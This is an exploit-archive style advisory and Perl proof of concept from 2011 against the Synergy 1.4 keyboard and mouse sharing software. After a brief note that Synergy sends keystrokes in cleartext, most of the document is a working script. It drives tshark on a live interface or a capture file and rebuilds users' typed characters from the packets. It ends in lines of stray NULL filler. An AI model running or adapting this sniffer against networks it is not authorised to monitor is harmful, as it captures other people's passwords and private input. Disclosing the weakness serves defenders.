Synergy 1.4 Protocol Cleartext Weakness Proof Of Concept

`# Exploit Title: Synergy Protocol cleartext weakness PoC  
# Date:April 5th 2011  
# Author: Sw1tCh  
# Software Link: http://synergy-foss.org/  
# Version: 1.4  
  
# -= Info =-  
*Synergy* is *Free and Open Source Software* that lets you easily share your  
mouse and keyboard between multiple computers, where each computer has it's  
own display. No special hardware is required, all you need is a local area  
network. Synergy is supported on Windows, Mac OS X and Linux. [Source =~  
Synergy-foss.org]  
  
#-= The Advisory =-  
Synergy's sends all keystrokes and mouse movements in clear text. This  
presents a huge vulnerability because if anyone is capturing packets on the  
network, they could eavesdrop on all information passed between the multiple  
computers.  
  
# -= PoC Script =-  
  
  
  
#!/usr/bin/perl  
#  
# synergyCap.pl - Developed by Sw1tCh to show the insecurity in Synergy  
Deskop Sharing application  
# The program works a lot better when through a closed network of one type  
of another  
# [such as an SSH tunnel]  
# [Note: The text isn't clear. Because of the protocol, text is sent in TCP  
and even with protocol  
# Standards, text does come out of order.  
##########################  
#  
# Obligatory Shouts -> gen0cide, Scruffy, Griff, D00dl3, BilboFraggin's  
#  
##########################  
  
use constant BANNER => q{  
  
/ / synergyCap -> Live or Forensic extractor of text  
passeed  
/ / from computers using Synergy Screen sharing  
/ <( - )> /  
/ / PoC Developed by Sw1tCh 2011  
/ / -> Need to work on my tshark filters...My perl is  
better :)  
/ /  
Softward -> Synergy - http://synergy-foss.org/  
  
Usage:  
- synergyCap.pl -forensic -file [FILE]  
- synergyCap.pl -live -interface [device {example eth0} ]  
  
};  
  
  
# ----- INCLUDES ----- #  
use strict;  
use warnings;  
use Getopt::Long;  
use Switch;  
use Time::HiRes qw( usleep sleep );  
use Term::ANSIColor qw(:constants);  
local $Term::ANSIColor::AUTORESET = 1;  
  
print BOLD BLUE BANNER;  
print "\n";  
  
my $forensic = 0;  
my $live = 0;  
my $options = "";  
my $capChar = "";  
  
GetOptions (  
'forensic' => \$forensic ,  
'live' => \$live ,  
'file' => \my $pcap_file ,  
'interface' => \my $interface ,  
  
);  
  
unless ( $ARGV[0] ) { print "ERROR : Bad file or Interface\n"; exit; }  
unless ( $live || $forensic ) { print "ERROR : No Option Specified [Live /  
or / Forensic \n"; exit; }  
  
  
if ( $live =~ m/1/ ) { $options = "i"; }  
elsif ( $forensic =~ m/1/ ) { $options = "r"; }  
  
open( TSHARK , "tshark -". $options . " " . $ARGV[0] ." -V |" ) or die  
"Failed to open TSHARK: $!";  
  
while( <TSHARK> )  
{  
if ($_ =~ /Key Id/) {  
  
if( $_ =~ s/Key Id\x3A\s//) {  
if ($_ < 128){  
print " " . chr($_) . "\n";  
$capChar = $capChar. chr($_);  
}  
}  
}  
  
}  
  
print "\n\n$capChar ";  
print "\n---+ Completed +--- \n";  
  
close( TSHARK );  
  
  
  
  
#Credits: Sw1tCh  
  
#Shoutouts : gen0cide, Scruffy, Griff, D00dl3, BilboFraggin's  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
--   
NULL,  
  
  
NULL NULL  
NULL NULL NULL NULL NULL  
NULL.NULL  
(NULL) NULL - NULL  
`